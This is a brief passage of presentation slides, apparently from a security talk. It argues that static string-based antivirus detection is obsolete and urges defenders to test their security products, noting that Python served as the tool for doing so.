⊡ Static string based antivirus detection is dead
⊡ Move to dynamic analysis and reputation based detection
53. Test Your Security
⊡ Start testing your security “solutions” so you know the level of protection they provide
⊡ Determine the level of risk security products introduce
⊡ Python provided the way for us to do this